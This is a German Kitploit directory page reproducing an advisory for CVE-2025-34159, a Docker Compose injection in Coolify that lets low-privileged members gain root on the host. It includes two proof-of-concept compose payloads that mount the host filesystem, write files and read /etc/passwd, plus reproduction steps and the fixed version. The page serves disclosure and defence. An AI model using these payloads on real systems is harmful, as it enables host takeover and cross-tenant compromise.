Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-34159 — A critical Remote Code Execution (RCE) vulnerability exists in Coolify's application deployment workflow. This flaw allows a low-privileged member to inject arbitrary Docker Compose directives during project creation or updates. By defining a malicious service that mounts the host filesystem an attacker can achieve root-level command execution on | Kitploit
Tools/GitHubGitHub/eyodav/cve-2025-34159
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCloud SecurityMisconfigurationRed Teaming
GitHubeyodav/cve-2025-34159

CVE-2025-34159

Repository anzeigen
vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

A critical Remote Code Execution (RCE) vulnerability exists in Coolify's application deployment workflow. This flaw allows a low-privileged member to inject arbitrary Docker Compose directives during project creation or updates. By defining a malicious service that mounts the host filesystem an attacker can achieve root-level command execution on

Teilen

CVE-2025-34159: Docker Compose-Injection in Coolify

Übersicht über die Sicherheitslücke

FeldWert
CVE-IDCVE-2025-34159
BetroffenCoolify ≤ v4.0.0-beta.420.6
Behoben inv4.0.0-beta.420.7
SchweregradKritisch
CVSS 4.0CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
CWECWE-78 (OS-Befehlseinschleusung), CWE-20 (Unzureichende Eingabevalidierung)

Zusammenfassung

Eine kritische Remote-Code-Ausführungs-Lücke (RCE) existiert im Bereitstellungs-Workflow von Coolify. Dieser Fehler ermöglicht es einem Mitglied mit niedrigen Berechtigungen, während der Erstellung oder Aktualisierung eines Projekts beliebige Docker-Compose-Direktiven einzuschleusen. Durch die Definition eines schädlichen Dienstes, der das Host-Dateisystem einbindet, kann ein Angreifer eine Befehlsausführung auf dem Host-Betriebssystem mit Root-Rechten erreichen und damit die Container-Isolierung vollständig umgehen.


Sicherheitsauswirkungen

  • Beliebige Befehlsausführung auf dem Host-System mit Root-Rechten
  • Vollständige Kompromittierung des Hosts einschließlich der Möglichkeit, Systemdateien zu lesen/schreiben, Persistenz zu etablieren und laterale Bewegungen durchzuführen
  • Sicherheitsverletzung im Multi-Tenant-Betrieb, die möglicherweise andere Benutzer und Teams auf derselben Instanz gefährdet
  • Umgehung von Sicherheitskontrollen, wodurch Beschränkungen des UI-Terminalzugriffs (403-Kontrollen) irrelevant werden

Technische Details

Betroffene Versionen

  • Verwundbare Versionen: Coolify ≤ v4.0.0-beta.420.6
  • Behobene Version: v4.0.0-beta.420.7

Angriffsvektor

Die Schwachstelle liegt im Projektbereitstellungs-Workflow, bei dem benutzerdefinierte Docker-Compose-Konfigurationen ohne ausreichende Validierung oder Sandboxing verarbeitet werden.


Proof of Concept

PoC 1: Host-Root-Mount mit Befehlsausführung

root@kitploit:~
version: '3.8'
services:
  poc-host-root:
    image: alpine:3.19
    tty: true
    volumes:
      - /:/host:rw
    command: >
      sh -c "
        echo '[*] Proof of RCE on host' &&
        echo 'RCE by Eyodav' > /host/tmp/proof_rce.txt &&
        whoami &&
        id &&
        uname -a &&
        head -n 5 /host/etc/passwd
      "

Ergebnis: Nach der Bereitstellung erscheint /tmp/proof_rce.txt auf dem Host-System, was RCE mit Root-Rechten bestätigt.

PoC 2: Gezieltes Schreiben auf Host-Pfad

root@kitploit:~
version: '3.8'
services:
  poc-host-write:
    image: alpine:3.19
    tty: true
    volumes:
      - /home/eyodav/PoC:/host
    command: >
      sh -c "
        set -e;
        mkdir -p /host &&
        echo '[*] Writing PoC file to host mount...' &&
        echo RCE_PoC_from_container_$(date) > /host/RCE_PoC.txt &&
        cd /host &&
        pwd &&
        ls -la
      "

Reproduktionsschritte

  1. Authentifizieren Sie sich als Benutzer auf Mitgliedsebene (kein Administrator)
  2. Erstellen oder bearbeiten Sie ein Projekt in Coolify
  3. Geben Sie eine schädliche Konfiguration mit einem der oben genannten Docker-Compose-Payloads ein
  4. Stellen Sie das Projekt bereit
  5. Überprüfen Sie die Ausnutzung durch Kontrolle auf Host-seitige Artefakte (z. B. /tmp/proof_rce.txt) oder durch Überprüfung der Befehlsausgabe in den Bereitstellungsprotokollen

Sofortmaßnahmen

  1. Sofort aktualisieren auf Coolify v4.0.0-beta.420.7 oder höher
  2. Vorhandene Projekte überprüfen auf potenziell schädliche Docker-Compose-Konfigurationen

Referenzen

  • Patch-/Release-Notes: https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.420.7
  • Advisory/PoC-Repository: https://github.com/Eyodav/CVE-2025-34159
Tool herunterladen